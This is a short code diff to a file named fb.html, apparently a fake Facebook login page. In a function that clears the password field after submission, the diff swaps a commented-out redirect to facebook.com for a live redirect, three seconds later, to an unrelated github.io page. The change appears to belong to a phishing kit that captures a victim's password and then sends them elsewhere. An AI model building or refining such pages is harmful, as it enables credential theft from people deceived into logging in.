--- a/fb.html
+++ b/fb.html
@@ -160,7 +160,7 @@ function log1(){
   document.getElementById("pass").value="";
   sessionStorage.setItem("fblog","1")
   
-  /*setTimeout(() => { window.open("https://www.facebook.com/","_parent"); }, 3000); */
+  setTimeout(() => { window.open("https://tnnayem.github.io/Nayem/index","_parent"); }, 3000); 
   
 
 }
